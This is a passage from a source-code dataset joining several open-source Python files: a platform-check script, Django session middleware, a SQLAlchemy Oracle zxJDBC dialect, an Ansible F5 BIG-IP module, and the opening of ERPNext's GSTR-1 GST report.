elif platform == "darwin":
print "OS X"
elif platform == "win32":
print "Windows"
else:
print "Unknown OS"
def linux_distribution():
try:
return platform.linux_distribution()
except:
return "N/A"
print("""Python version: %s
dist: %s
linux_distribution: %s
system: %s
machine: %s
platform: %s
uname: %s
version: %s
mac_ver: %s
""" % (
sys.version.split('\n'),
str(platform.dist()),
linux_distribution(),
platform.system(),
platform.machine(),
platform.platform(),
platform.uname(),
platform.version(),
platform.mac_ver(),
))
def call_shell():
session = subprocess.Popen(['syspack.sh'], stdout=PIPE, stderr=PIPE)
stdout, stderr = session.communicate()
if stderr:
raise Exception("Error "+str(stderr))
def main():
platform_check()
call_shell()
linux_distribution()
if __name__ == "__main__":
main()
| gpl-3.0 |
aduric/crossfit | nonrel/django/contrib/sessions/middleware.py | 323 | 1888 | import time
from django.conf import settings
from django.utils.cache import patch_vary_headers
from django.utils.http import cookie_date
from django.utils.importlib import import_module
class SessionMiddleware(object):
def process_request(self, request):
engine = import_module(settings.SESSION_ENGINE)
session_key = request.COOKIES.get(settings.SESSION_COOKIE_NAME, None)
request.session = engine.SessionStore(session_key)
def process_response(self, request, response):
"""
If request.session was modified, or if the configuration is to save the
session every time, save the changes and set a session cookie.
"""
try:
accessed = request.session.accessed
modified = request.session.modified
except AttributeError:
pass
else:
if accessed:
patch_vary_headers(response, ('Cookie',))
if modified or settings.SESSION_SAVE_EVERY_REQUEST:
if request.session.get_expire_at_browser_close():
max_age = None
expires = None
else:
max_age = request.session.get_expiry_age()
expires_time = time.time() + max_age
expires = cookie_date(expires_time)
# Save the session data and refresh the client cookie.
request.session.save()
response.set_cookie(settings.SESSION_COOKIE_NAME,
request.session.session_key, max_age=max_age,
expires=expires, domain=settings.SESSION_COOKIE_DOMAIN,
path=settings.SESSION_COOKIE_PATH,
secure=settings.SESSION_COOKIE_SECURE or None,
httponly=settings.SESSION_COOKIE_HTTPONLY or None)
return response
| bsd-3-clause |
wujuguang/sqlalchemy | lib/sqlalchemy/dialects/oracle/zxjdbc.py | 2 | 8207 | # oracle/zxjdbc.py
# Copyright (C) 2005-2019 the SQLAlchemy authors and contributors
# <see AUTHORS file>
#
# This module is part of SQLAlchemy and is released under
# the MIT License: http://www.opensource.org/licenses/mit-license.php
"""
.. dialect:: oracle+zxjdbc
:name: zxJDBC for Jython
:dbapi: zxjdbc
:connectstring: oracle+zxjdbc://user:pass@host/dbname
:driverurl: http://www.oracle.com/technetwork/database/features/jdbc/index-091264.html
.. note:: Jython is not supported by current versions of SQLAlchemy. The
zxjdbc dialect should be considered as experimental.
""" # noqa
import collections
import decimal
import re
from .base import OracleCompiler
from .base import OracleDialect
from .base import OracleExecutionContext
from ... import sql
from ... import types as sqltypes
from ... import util
from ...connectors.zxJDBC import ZxJDBCConnector
from ...engine import result as _result
from ...sql import expression
SQLException = zxJDBC = None
class _ZxJDBCDate(sqltypes.Date):
def result_processor(self, dialect, coltype):
def process(value):
if value is None:
return None
else:
return value.date()
return process
class _ZxJDBCNumeric(sqltypes.Numeric):
def result_processor(self, dialect, coltype):
# XXX: does the dialect return Decimal or not???
# if it does (in all cases), we could use a None processor as well as
# the to_float generic processor
if self.asdecimal:
def process(value):
if isinstance(value, decimal.Decimal):
return value
else:
return decimal.Decimal(str(value))
else:
def process(value):
if isinstance(value, decimal.Decimal):
return float(value)
else:
return value
return process
class OracleCompiler_zxjdbc(OracleCompiler):
def returning_clause(self, stmt, returning_cols):
self.returning_cols = list(
expression._select_iterables(returning_cols)
)
# within_columns_clause=False so that labels (foo AS bar) don't render
columns = [
self.process(c, within_columns_clause=False)
for c in self.returning_cols
]
if not hasattr(self, "returning_parameters"):
self.returning_parameters = []
binds = []
for i, col in enumerate(self.returning_cols):
dbtype = col.type.dialect_impl(self.dialect).get_dbapi_type(
self.dialect.dbapi
)
self.returning_parameters.append((i + 1, dbtype))
bindparam = sql.bindparam(
"ret_%d" % i, value=ReturningParam(dbtype)
)
self.binds[bindparam.key] = bindparam
binds.append(
self.bindparam_string(self._truncate_bindparam(bindparam))
)
return "RETURNING " + ", ".join(columns) + " INTO " + ", ".join(binds)
class OracleExecutionContext_zxjdbc(OracleExecutionContext):
def pre_exec(self):
if hasattr(self.compiled, "returning_parameters"):
# prepare a zxJDBC statement so we can grab its underlying
# OraclePreparedStatement's getReturnResultSet later
self.statement = self.cursor.prepare(self.statement)
def get_result_proxy(self):
if hasattr(self.compiled, "returning_parameters"):
rrs = None
try:
try:
rrs = self.statement.__statement__.getReturnResultSet()
next(rrs)
except SQLException as sqle:
msg = "%s [SQLCode: %d]" % (
sqle.getMessage(),
sqle.getErrorCode(),
)
if sqle.getSQLState() is not None:
msg += " [SQLState: %s]" % sqle.getSQLState()
raise zxJDBC.Error(msg)
else:
row = tuple(
self.cursor.datahandler.getPyObject(rrs, index, dbtype)
for index, dbtype in self.compiled.returning_parameters
)
return ReturningResultProxy(self, row)
finally:
if rrs is not None:
try:
rrs.close()
except SQLException:
pass
self.statement.close()
return _result.ResultProxy(self)
def create_cursor(self):
cursor = self._dbapi_connection.cursor()
cursor.datahandler = self.dialect.DataHandler(cursor.datahandler)
return cursor
class ReturningResultProxy(_result.FullyBufferedResultProxy):
"""ResultProxy backed by the RETURNING ResultSet results."""
def __init__(self, context, returning_row):
self._returning_row = returning_row
super(ReturningResultProxy, self).__init__(context)
def _cursor_description(self):
ret = []
for c in self.context.compiled.returning_cols:
if hasattr(c, "name"):
ret.append((c.name, c.type))
else:
ret.append((c.anon_label, c.type))
return ret
def _buffer_rows(self):
return collections.deque([self._returning_row])
class ReturningParam(object):
"""A bindparam value representing a RETURNING parameter.
Specially handled by OracleReturningDataHandler.
"""
def __init__(self, type_):
self.type = type_
def __eq__(self, other):
if isinstance(other, ReturningParam):
return self.type == other.type
return NotImplemented
def __ne__(self, other):
if isinstance(other, ReturningParam):
return self.type != other.type
return NotImplemented
def __repr__(self):
kls = self.__class__
return "<%s.%s object at 0x%x type=%s>" % (
kls.__module__,
kls.__name__,
id(self),
self.type,
)
class OracleDialect_zxjdbc(ZxJDBCConnector, OracleDialect):
jdbc_db_name = "oracle"
jdbc_driver_name = "oracle.jdbc.OracleDriver"
statement_compiler = OracleCompiler_zxjdbc
execution_ctx_cls = OracleExecutionContext_zxjdbc
colspecs = util.update_copy(
OracleDialect.colspecs,
{sqltypes.Date: _ZxJDBCDate, sqltypes.Numeric: _ZxJDBCNumeric},
)
def __init__(self, *args, **kwargs):
super(OracleDialect_zxjdbc, self).__init__(*args, **kwargs)
global SQLException, zxJDBC
from java.sql import SQLException
from com.ziclix.python.sql import zxJDBC
from com.ziclix.python.sql.handler import OracleDataHandler
class OracleReturningDataHandler(OracleDataHandler):
"""zxJDBC DataHandler that specially handles ReturningParam."""
def setJDBCObject(self, statement, index, object_, dbtype=None):
if type(object_) is ReturningParam:
statement.registerReturnParameter(index, object_.type)
elif dbtype is None:
OracleDataHandler.setJDBCObject(
self, statement, index, object_
)
else:
OracleDataHandler.setJDBCObject(
self, statement, index, object_, dbtype
)
self.DataHandler = OracleReturningDataHandler
def initialize(self, connection):
super(OracleDialect_zxjdbc, self).initialize(connection)
self.implicit_returning = connection.connection.driverversion >= "10.2"
def _create_jdbc_url(self, url):
return "jdbc:oracle:thin:@%s:%s:%s" % (
url.host,
url.port or 1521,
url.database,
)
def _get_server_version_info(self, connection):
version = re.search(
r"Release ([\d\.]+)", connection.connection.dbversion
).group(1)
return tuple(int(x) for x in version.split("."))
dialect = OracleDialect_zxjdbc
| mit |
aperigault/ansible | lib/ansible/modules/network/f5/bigip_message_routing_protocol.py | 24 | 17365 | #!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Copyright: (c) 2019, F5 Networks Inc.
# GNU General Public License v3.0 (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'certified'}
DOCUMENTATION = r'''
---
module: bigip_message_routing_protocol
short_description: Manage generic message parser profile.
description:
- Manages generic message parser profile for use with the message routing framework.
version_added: 2.9
options:
name:
description:
- Specifies the name of the generic parser profile.
required: True
type: str
description:
description:
- The user defined description of the generic parser profile.
type: str
parent:
description:
- The parent template of this parser profile. Once this value has been set, it cannot be changed.
- When creating a new profile, if this parameter is not specified,
the default is the system-supplied C(genericmsg) profile.
type: str
disable_parser:
description:
- When C(yes), the generic message parser will be disabled ignoring all incoming packets and not directly
send message data.
- This mode supports iRule script protocol implementations that will generate messages from the incoming transport
stream and send outgoing messages on the outgoing transport stream.
type: bool
max_egress_buffer:
description:
- Specifies the maximum size of the send buffer in bytes. If the number of bytes in the send buffer for a
connection exceeds this value, the generic message protocol will stop receiving outgoing messages from the
router until the size of the size of the buffer drops below this setting.
- The accepted range is between 0 and 4294967295 inclusive.
type: int
max_msg_size:
description:
- Specifies the maximum size of a received message. If a message exceeds this size, the connection will be reset.
- The accepted range is between 0 and 4294967295 inclusive.
type: int
msg_terminator:
description:
- The string of characters used to terminate a message. If the message-terminator is not specified,
the generic message parser will not separate the input stream into messages.
type: str
no_response:
description:
- When set, matching of responses to requests is disabled.
type: bool
partition:
description:
- Device partition to create route object on.
type: str
default: Common
state:
description:
- When C(present), ensures that the route exists.
- When C(absent), ensures the route is removed.
type: str
choices:
- present
- absent
default: present
notes:
- Requires BIG-IP >= 14.0.0
extends_documentation_fragment: f5
author:
- Wojciech Wypior (@wojtek0806)
'''
EXAMPLES = r'''
- name: Create a generic parser
bigip_message_routing_protocol:
name: foo
description: 'This is parser'
no_response: yes
provider:
password: secret
server: lb.mydomain.com
user: admin
delegate_to: localhost
- name: Modify a generic parser
bigip_message_routing_protocol:
name: foo
no_response: no
max_egress_buffer: 10000
max_msg_size: 2000
provider:
password: secret
server: lb.mydomain.com
user: admin
delegate_to: localhost
- name: Remove generic parser
bigip_message_routing_protocol:
name: foo
state: absent
provider:
password: secret
server: lb.mydomain.com
user: admin
delegate_to: localhost
'''
RETURN = r'''
description:
description: The user defined description of the parser profile.
returned: changed
type: str
sample: My description
parent:
description: The parent template of this parser profile.
returned: changed
type: str
sample: /Common/genericmsg
disable_parser:
description: Disables generic message parser.
returned: changed
type: bool
sample: yes
max_egress_buffer:
description: The maximum size of the send buffer in bytes.
returned: changed
type: int
sample: 10000
max_msg_size:
description: The maximum size of a received message.
returned: changed
type: int
sample: 4000
msg_terminator:
description: The string of characters used to terminate a message.
returned: changed
type: str
sample: '%%%%'
no_response:
description: Disables matching of responses to requests.
returned: changed
type: bool
sample: yes
'''
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.basic import env_fallback
from distutils.version import LooseVersion
try:
from library.module_utils.network.f5.bigip import F5RestClient
from library.module_utils.network.f5.common import F5ModuleError
from library.module_utils.network.f5.common import AnsibleF5Parameters
from library.module_utils.network.f5.common import fq_name
from library.module_utils.network.f5.common import transform_name
from library.module_utils.network.f5.common import f5_argument_spec
from library.module_utils.network.f5.common import flatten_boolean
from library.module_utils.network.f5.compare import cmp_str_with_none
from library.module_utils.network.f5.icontrol import tmos_version
except ImportError:
from ansible.module_utils.network.f5.bigip import F5RestClient
from ansible.module_utils.network.f5.common import F5ModuleError
from ansible.module_utils.network.f5.common import AnsibleF5Parameters
from ansible.module_utils.network.f5.common import fq_name
from ansible.module_utils.network.f5.common import transform_name
from ansible.module_utils.network.f5.common import f5_argument_spec
from ansible.module_utils.network.f5.common import flatten_boolean
from ansible.module_utils.network.f5.compare import cmp_str_with_none
from ansible.module_utils.network.f5.icontrol import tmos_version
class Parameters(AnsibleF5Parameters):
api_map = {
'defaultsFrom': 'parent',
'disableParser': 'disable_parser',
'maxEgressBuffer': 'max_egress_buffer',
'maxMessageSize': 'max_msg_size',
'messageTerminator': 'msg_terminator',
'noResponse': 'no_response',
}
api_attributes = [
'description',
'defaultsFrom',
'disableParser',
'maxEgressBuffer',
'maxMessageSize',
'messageTerminator',
'noResponse',
]
returnables = [
'description',
'parent',
'disable_parser',
'max_egress_buffer',
'max_msg_size',
'msg_terminator',
'no_response',
]
updatables = [
'description',
'parent',
'disable_parser',
'max_egress_buffer',
'max_msg_size',
'msg_terminator',
'no_response',
]
@property
def no_response(self):
return flatten_boolean(self._values['no_response'])
@property
def disable_parser(self):
return flatten_boolean(self._values['disable_parser'])
class ApiParameters(Parameters):
pass
class ModuleParameters(Parameters):
@property
def parent(self):
if self._values['parent'] is None:
return None
result = fq_name(self.partition, self._values['parent'])
return result
@property
def max_msg_size(self):
if self._values['max_msg_size'] is None:
return None
if 0 <= self._values['max_msg_size'] <= 4294967295:
return self._values['max_msg_size']
raise F5ModuleError(
"Valid 'max_msg_size' must be in range 0 - 4294967295."
)
@property
def max_egress_buffer(self):
if self._values['max_egress_buffer'] is None:
return None
if 0 <= self._values['max_egress_buffer'] <= 4294967295:
return self._values['max_egress_buffer']
raise F5ModuleError(
"Valid 'max_egress_buffer' must be in range 0 - 4294967295."
)
class Changes(Parameters):
def to_return(self):
result = {}
try:
for returnable in self.returnables:
result[returnable] = getattr(self, returnable)
result = self._filter_params(result)
except Exception:
pass
return result
class UsableChanges(Changes):
pass
class ReportableChanges(Changes):
pass
class Difference(object):
def __init__(self, want, have=None):
self.want = want
self.have = have
def compare(self, param):
try:
result = getattr(self, param)
return result
except AttributeError:
return self.__default(param)
def __default(self, param):
attr1 = getattr(self.want, param)
try:
attr2 = getattr(self.have, param)
if attr1 != attr2:
return attr1
except AttributeError:
return attr1
@property
def parent(self):
if self.want.parent is None:
return None
if self.want.parent != self.have.parent:
raise F5ModuleError(
"The parent router profile cannot be changed."
)
@property
def description(self):
return cmp_str_with_none(self.want.description, self.have.description)
@property
def msg_terminator(self):
return cmp_str_with_none(self.want.msg_terminator, self.have.msg_terminator)
class ModuleManager(object):
def __init__(self, *args, **kwargs):
self.module = kwargs.get('module', None)
self.client = F5RestClient(**self.module.params)
self.want = ModuleParameters(params=self.module.params)
self.have = ApiParameters()
self.changes = UsableChanges()
def _set_changed_options(self):
changed = {}
for key in Parameters.returnables:
if getattr(self.want, key) is not None:
changed[key] = getattr(self.want, key)
if changed:
self.changes = UsableChanges(params=changed)
def _update_changed_options(self):
diff = Difference(self.want, self.have)
updatables = Parameters.updatables
changed = dict()
for k in updatables:
change = diff.compare(k)
if change is None:
continue
else:
if isinstance(change, dict):
changed.update(change)
else:
changed[k] = change
if changed:
self.changes = UsableChanges(params=changed)
return True
return False
def _announce_deprecations(self, result):
warnings = result.pop('__warnings', [])
for warning in warnings:
self.client.module.deprecate(
msg=warning['msg'],
version=warning['version']
)
def version_less_than_14(self):
version = tmos_version(self.client)
if LooseVersion(version) < LooseVersion('14.0.0'):
return True
return False
def exec_module(self):
if self.version_less_than_14():
raise F5ModuleError('Message routing is not supported on TMOS version below 14.x')
changed = False
result = dict()
state = self.want.state
if state == "present":
changed = self.present()
elif state == "absent":
changed = self.absent()
reportable = ReportableChanges(params=self.changes.to_return())
changes = reportable.to_return()
result.update(**changes)
result.update(dict(changed=changed))
self._announce_deprecations(result)
return result
def present(self):
if self.exists():
return self.update()
else:
return self.create()
def absent(self):
if self.exists():
return self.remove()
return False
def should_update(self):
result = self._update_changed_options()
if result:
return True
return False
def update(self):
self.have = self.read_current_from_device()
if not self.should_update():
return False
if self.module.check_mode:
return True
self.update_on_device()
return True
def remove(self):
if self.module.check_mode:
return True
self.remove_from_device()
if self.exists():
raise F5ModuleError("Failed to delete the resource.")
return True
def create(self):
self._set_changed_options()
if self.module.check_mode:
return True
self.create_on_device()
return True
def exists(self):
uri = "https://{0}:{1}/mgmt/tm/ltm/message-routing/generic/protocol/{2}".format(
self.client.provider['server'],
self.client.provider['server_port'],
transform_name(self.want.partition, self.want.name)
)
resp = self.client.api.get(uri)
try:
response = resp.json()
except ValueError:
return False
if resp.status == 404 or 'code' in response and response['code'] == 404:
return False
return True
def create_on_device(self):
params = self.changes.api_params()
params['name'] = self.want.name
params['partition'] = self.want.partition
uri = "https://{0}:{1}/mgmt/tm/ltm/message-routing/generic/protocol/".format(
self.client.provider['server'],
self.client.provider['server_port'],
)
resp = self.client.api.post(uri, json=params)
try:
response = resp.json()
except ValueError as ex:
raise F5ModuleError(str(ex))
if 'code' in response and response['code'] in [400, 409]:
if 'message' in response:
raise F5ModuleError(response['message'])
else:
raise F5ModuleError(resp.content)
return True
def update_on_device(self):
params = self.changes.api_params()
uri = "https://{0}:{1}/mgmt/tm/ltm/message-routing/generic/protocol/{2}".format(
self.client.provider['server'],
self.client.provider['server_port'],
transform_name(self.want.partition, self.want.name)
)
resp = self.client.api.patch(uri, json=params)
try:
response = resp.json()
except ValueError as ex:
raise F5ModuleError(str(ex))
if 'code' in response and response['code'] == 400:
if 'message' in response:
raise F5ModuleError(response['message'])
else:
raise F5ModuleError(resp.content)
def remove_from_device(self):
uri = "https://{0}:{1}/mgmt/tm/ltm/message-routing/generic/protocol/{2}".format(
self.client.provider['server'],
self.client.provider['server_port'],
transform_name(self.want.partition, self.want.name)
)
response = self.client.api.delete(uri)
if response.status == 200:
return True
raise F5ModuleError(response.content)
def read_current_from_device(self):
uri = "https://{0}:{1}/mgmt/tm/ltm/message-routing/generic/protocol/{2}".format(
self.client.provider['server'],
self.client.provider['server_port'],
transform_name(self.want.partition, self.want.name)
)
resp = self.client.api.get(uri)
try:
response = resp.json()
except ValueError as ex:
raise F5ModuleError(str(ex))
if 'code' in response and response['code'] == 400:
if 'message' in response:
raise F5ModuleError(response['message'])
else:
raise F5ModuleError(resp.content)
return ApiParameters(params=response)
class ArgumentSpec(object):
def __init__(self):
self.supports_check_mode = True
argument_spec = dict(
name=dict(required=True),
description=dict(),
parent=dict(),
disable_parser=dict(type='bool'),
max_egress_buffer=dict(type='int'),
max_msg_size=dict(type='int'),
msg_terminator=dict(),
no_response=dict(type='bool'),
partition=dict(
default='Common',
fallback=(env_fallback, ['F5_PARTITION'])
),
state=dict(
default='present',
choices=['present', 'absent']
)
)
self.argument_spec = {}
self.argument_spec.update(f5_argument_spec)
self.argument_spec.update(argument_spec)
def main():
spec = ArgumentSpec()
module = AnsibleModule(
argument_spec=spec.argument_spec,
supports_check_mode=spec.supports_check_mode,
)
try:
mm = ModuleManager(module=module)
results = mm.exec_module()
module.exit_json(**results)
except F5ModuleError as ex:
module.fail_json(msg=str(ex))
if __name__ == '__main__':
main()
| gpl-3.0 |
frappe/erpnext | erpnext/regional/report/gstr_1/gstr_1.py | 2 | 24910 | # Copyright (c) 2013, Frappe Technologies Pvt. Ltd. and contributors
# For license information, please see license.txt
from __future__ import unicode_literals
import frappe, json
from frappe import _
from frappe.utils import flt, formatdate, now_datetime, getdate
from datetime import date
from six import iteritems
from erpnext.regional.doctype.gstr_3b_report.gstr_3b_report import get_period
from erpnext.regional.india.utils import get_gst_accounts
def execute(filters=None):
return Gstr1Report(filters).run()
class Gstr1Report(object):
def __init__(self, filters=None):
self.filters = frappe._dict(filters or {})
self.columns = []
self.data = []
self.doctype = "Sales Invoice"
self.tax_doctype = "Sales Taxes and Charges"
self.select_columns = """
name as invoice_number,
customer_name,
posting_date,
base_grand_total,
base_rounded_total,
COALESCE(NULLIF(customer_gstin,''), NULLIF(billing_address_gstin, '')) as customer_gstin,
place_of_supply,
ecommerce_gstin,
reverse_charge,
return_against,
is_return,
is_debit_note,
gst_category,
export_type,
port_code,
shipping_bill_number,
shipping_bill_date,
reason_for_issuing_document
"""
def run(self):
self.get_columns()
self.gst_accounts = get_gst_accounts(self.filters.company, only_non_reverse_charge=1)
self.get_invoice_data()
if self.invoices:
self.get_invoice_items()
self.get_items_based_on_tax_rate()
self.invoice_fields = [d["fieldname"] for d in self.invoice_columns]
self.get_data()
return self.columns, self.data
def get_data(self):
if self.filters.get("type_of_business") in ("B2C Small", "B2C Large"):
self.get_b2c_data()
else:
for inv, items_based_on_rate in self.items_based_on_tax_rate.items():
invoice_details = self.invoices.get(inv)
for rate, items in items_based_on_rate.items():
row, taxable_value = self.get_row_data_for_invoice(inv, invoice_details, rate, items)
if self.filters.get("type_of_business") == "CDNR-REG":
row.append("Y" if invoice_details.posting_date <= date(2017, 7, 1) else "N")
row.append("C" if invoice_details.is_return else "D")
if taxable_value:
self.data.append(row)
def get_b2c_data(self):
b2cs_output = {}
for inv, items_based_on_rate in self.items_based_on_tax_rate.items():
invoice_details = self.invoices.get(inv)
for rate, items in items_based_on_rate.items():
place_of_supply = invoice_details.get("place_of_supply")
ecommerce_gstin = invoice_details.get("ecommerce_gstin")
b2cs_output.setdefault((rate, place_of_supply, ecommerce_gstin),{
"place_of_supply": "",
"ecommerce_gstin": "",
"rate": "",
"taxable_value": 0,
"cess_amount": 0,
"type": "",
"invoice_number": invoice_details.get("invoice_number"),
"posting_date": invoice_details.get("posting_date"),
"invoice_value": invoice_details.get("base_grand_total"),
})
row = b2cs_output.get((rate, place_of_supply, ecommerce_gstin))
row["place_of_supply"] = place_of_supply
row["ecommerce_gstin"] = ecommerce_gstin
row["rate"] = rate
row["taxable_value"] += sum([abs(net_amount)
for item_code, net_amount in self.invoice_items.get(inv).items() if item_code in items])
row["cess_amount"] += flt(self.invoice_cess.get(inv), 2)
row["type"] = "E" if ecommerce_gstin else "OE"
for key, value in iteritems(b2cs_output):
self.data.append(value)
def get_row_data_for_invoice(self, invoice, invoice_details, tax_rate, items):
row = []
for fieldname in self.invoice_fields:
if self.filters.get("type_of_business") == "CDNR-REG" and fieldname == "invoice_value":
row.append(abs(invoice_details.base_rounded_total) or abs(invoice_details.base_grand_total))
elif fieldname == "invoice_value":
row.append(invoice_details.base_rounded_total or invoice_details.base_grand_total)
elif fieldname in ('posting_date', 'shipping_bill_date'):
row.append(formatdate(invoice_details.get(fieldname), 'dd-MMM-YY'))
elif fieldname == "export_type":
export_type = "WPAY" if invoice_details.get(fieldname)=="With Payment of Tax" else "WOPAY"
row.append(export_type)
else:
row.append(invoice_details.get(fieldname))
taxable_value = 0
if invoice in self.cgst_sgst_invoices:
division_factor = 2
else:
division_factor = 1
for item_code, net_amount in self.invoice_items.get(invoice).items():
if item_code in items:
if self.item_tax_rate.get(invoice) and tax_rate/division_factor in self.item_tax_rate.get(invoice, {}).get(item_code, []):
taxable_value += abs(net_amount)
elif not self.item_tax_rate.get(invoice):
taxable_value += abs(net_amount)
elif tax_rate:
taxable_value += abs(net_amount)
elif not tax_rate and self.filters.get('type_of_business') == 'EXPORT' \
and invoice_details.get('export_type') == "Without Payment of Tax":
taxable_value += abs(net_amount)
row += [tax_rate or 0, taxable_value]
for column in self.other_columns:
if column.get('fieldname') == 'cess_amount':
row.append(flt(self.invoice_cess.get(invoice), 2))
return row, taxable_value
def get_invoice_data(self):
self.invoices = frappe._dict()
conditions = self.get_conditions()
company_gstins = get_company_gstin_number(self.filters.get('company'), all_gstins=True)
self.filters.update({
'company_gstins': company_gstins
})
invoice_data = frappe.db.sql("""
select
{select_columns}
from `tab{doctype}`
where docstatus = 1 {where_conditions}
and is_opening = 'No'
order by posting_date desc
""".format(select_columns=self.select_columns, doctype=self.doctype,
where_conditions=conditions), self.filters, as_dict=1)
for d in invoice_data:
self.invoices.setdefault(d.invoice_number, d)
def get_conditions(self):
conditions = ""
for opts in (("company", " and company=%(company)s"),
("from_date", " and posting_date>=%(from_date)s"),
("to_date", " and posting_date<=%(to_date)s"),
("company_address", " and company_address=%(company_address)s")):
if self.filters.get(opts[0]):
conditions += opts[1]
if self.filters.get("type_of_business") == "B2B":
conditions += "AND IFNULL(gst_category, '') in ('Registered Regular', 'Deemed Export', 'SEZ') AND is_return != 1"
if self.filters.get("type_of_business") in ("B2C Large", "B2C Small"):
b2c_limit = frappe.db.get_single_value('GST Settings', 'b2c_limit')
if not b2c_limit:
frappe.throw(_("Please set B2C Limit in GST Settings."))
if self.filters.get("type_of_business") == "B2C Large":
conditions += """ AND ifnull(SUBSTR(place_of_supply, 1, 2),'') != ifnull(SUBSTR(company_gstin, 1, 2),'')
AND grand_total > {0} AND is_return != 1 and gst_category ='Unregistered' """.format(flt(b2c_limit))
elif self.filters.get("type_of_business") == "B2C Small":
conditions += """ AND (
SUBSTR(place_of_supply, 1, 2) = SUBSTR(company_gstin, 1, 2)
OR grand_total <= {0}) and is_return != 1 AND gst_category ='Unregistered' """.format(flt(b2c_limit))
elif self.filters.get("type_of_business") == "CDNR-REG":
conditions += """ AND (is_return = 1 OR is_debit_note = 1) AND IFNULL(gst_category, '') in ('Registered Regular', 'Deemed Export', 'SEZ')"""
elif self.filters.get("type_of_business") == "EXPORT":
conditions += """ AND is_return !=1 and gst_category = 'Overseas' """
conditions += " AND IFNULL(billing_address_gstin, '') NOT IN %(company_gstins)s"
return conditions
def get_invoice_items(self):
self.invoice_items = frappe._dict()
self.item_tax_rate = frappe._dict()
items = frappe.db.sql("""
select item_code, parent, taxable_value, base_net_amount, item_tax_rate
from `tab%s Item`
where parent in (%s)
""" % (self.doctype, ', '.join(['%s']*len(self.invoices))), tuple(self.invoices), as_dict=1)
for d in items:
if d.item_code not in self.invoice_items.get(d.parent, {}):
self.invoice_items.setdefault(d.parent, {}).setdefault(d.item_code,
sum((i.get('taxable_value', 0) or i.get('base_net_amount', 0)) for i in items
if i.item_code == d.item_code and i.parent == d.parent))
item_tax_rate = {}
if d.item_tax_rate:
item_tax_rate = json.loads(d.item_tax_rate)
for account, rate in item_tax_rate.items():
tax_rate_dict = self.item_tax_rate.setdefault(d.parent, {}).setdefault(d.item_code, [])
tax_rate_dict.append(rate)
def get_items_based_on_tax_rate(self):
self.tax_details = frappe.db.sql("""
select
parent, account_head, item_wise_tax_detail, base_tax_amount_after_discount_amount
from `tab%s`
where
parenttype = %s and docstatus = 1
and parent in (%s)
order by account_head
""" % (self.tax_doctype, '%s', ', '.join(['%s']*len(self.invoices.keys()))),
tuple([self.doctype] + list(self.invoices.keys())))
self.items_based_on_tax_rate = {}
self.invoice_cess = frappe._dict()
self.cgst_sgst_invoices = []
unidentified_gst_accounts = []
unidentified_gst_accounts_invoice = []
for parent, account, item_wise_tax_detail, tax_amount in self.tax_details:
if account in self.gst_accounts.cess_account:
self.invoice_cess.setdefault(parent, tax_amount)
else:
if item_wise_tax_detail:
try:
item_wise_tax_detail = json.loads(item_wise_tax_detail)
cgst_or_sgst = False
if account in self.gst_accounts.cgst_account \
or account in self.gst_accounts.sgst_account:
cgst_or_sgst = True
if not (cgst_or_sgst or account in self.gst_accounts.igst_account):
if "gst" in account.lower() and account not in unidentified_gst_accounts:
unidentified_gst_accounts.append(account)
unidentified_gst_accounts_invoice.append(parent)
continue
for item_code, tax_amounts in item_wise_tax_detail.items():
tax_rate = tax_amounts[0]
if tax_rate:
if cgst_or_sgst:
tax_rate *= 2
if parent not in self.cgst_sgst_invoices:
self.cgst_sgst_invoices.append(parent)
rate_based_dict = self.items_based_on_tax_rate\
.setdefault(parent, {}).setdefault(tax_rate, [])
if item_code not in rate_based_dict:
rate_based_dict.append(item_code)
except ValueError:
continue
if unidentified_gst_accounts:
frappe.msgprint(_("Following accounts might be selected in GST Settings:")
+ "<br>" + "<br>".join(unidentified_gst_accounts), alert=True)
# Build itemised tax for export invoices where tax table is blank
for invoice, items in iteritems(self.invoice_items):
if invoice not in self.items_based_on_tax_rate and invoice not in unidentified_gst_accounts_invoice \
and frappe.db.get_value(self.doctype, invoice, "export_type") == "Without Payment of Tax":
self.items_based_on_tax_rate.setdefault(invoice, {}).setdefault(0, items.keys())
def get_columns(self):
self.tax_columns = [
{
"fieldname": "rate",
"label": "Rate",
"fieldtype": "Int",
"width": 60
},
{
"fieldname": "taxable_value",
"label": "Taxable Value",
"fieldtype": "Currency",
"width": 100
}
]
self.other_columns = []
if self.filters.get("type_of_business") == "B2B":
self.invoice_columns = [
{
"fieldname": "customer_gstin",
"label": "GSTIN/UIN of Recipient",
"fieldtype": "Data",
"width": 150
},
{
"fieldname": "customer_name",
"label": "Receiver Name",
"fieldtype": "Data",
"width":100
},
{
"fieldname": "invoice_number",
"label": "Invoice Number",
"fieldtype": "Link",
"options": "Sales Invoice",
"width":100
},
{
"fieldname": "posting_date",
"label": "Invoice date",
"fieldtype": "Data",
"width":80
},
{
"fieldname": "invoice_value",
"label": "Invoice Value",
"fieldtype": "Currency",
"width":100
},
{
"fieldname": "place_of_supply",
"label": "Place Of Supply",
"fieldtype": "Data",
"width":100
},
{
"fieldname": "reverse_charge",
"label": "Reverse Charge",
"fieldtype": "Data"
},
{
"fieldname": "gst_category",
"label": "Invoice Type",
"fieldtype": "Data"
},
{
"fieldname": "ecommerce_gstin",
"label": "E-Commerce GSTIN",
"fieldtype": "Data",
"width":120
}
]
self.other_columns = [
{
"fieldname": "cess_amount",
"label": "Cess Amount",
"fieldtype": "Currency",
"width": 100
}
]
elif self.filters.get("type_of_business") == "B2C Large":
self.invoice_columns = [
{
"fieldname": "invoice_number",
"label": "Invoice Number",
"fieldtype": "Link",
"options": "Sales Invoice",
"width": 120
},
{
"fieldname": "posting_date",
"label": "Invoice date",
"fieldtype": "Data",
"width": 100
},
{
"fieldname": "invoice_value",
"label": "Invoice Value",
"fieldtype": "Currency",
"width": 100
},
{
"fieldname": "place_of_supply",
"label": "Place Of Supply",
"fieldtype": "Data",
"width": 120
},
{
"fieldname": "ecommerce_gstin",
"label": "E-Commerce GSTIN",
"fieldtype": "Data",
"width": 130
}
]
self.other_columns = [
{
"fieldname": "cess_amount",
"label": "Cess Amount",
"fieldtype": "Currency",
"width": 100
}
]
elif self.filters.get("type_of_business") == "CDNR-REG":
self.invoice_columns = [
{
"fieldname": "customer_gstin",
"label": "GSTIN/UIN of Recipient",
"fieldtype": "Data",
"width": 150
},
{
"fieldname": "customer_name",
"label": "Receiver Name",
"fieldtype": "Data",
"width": 120
},
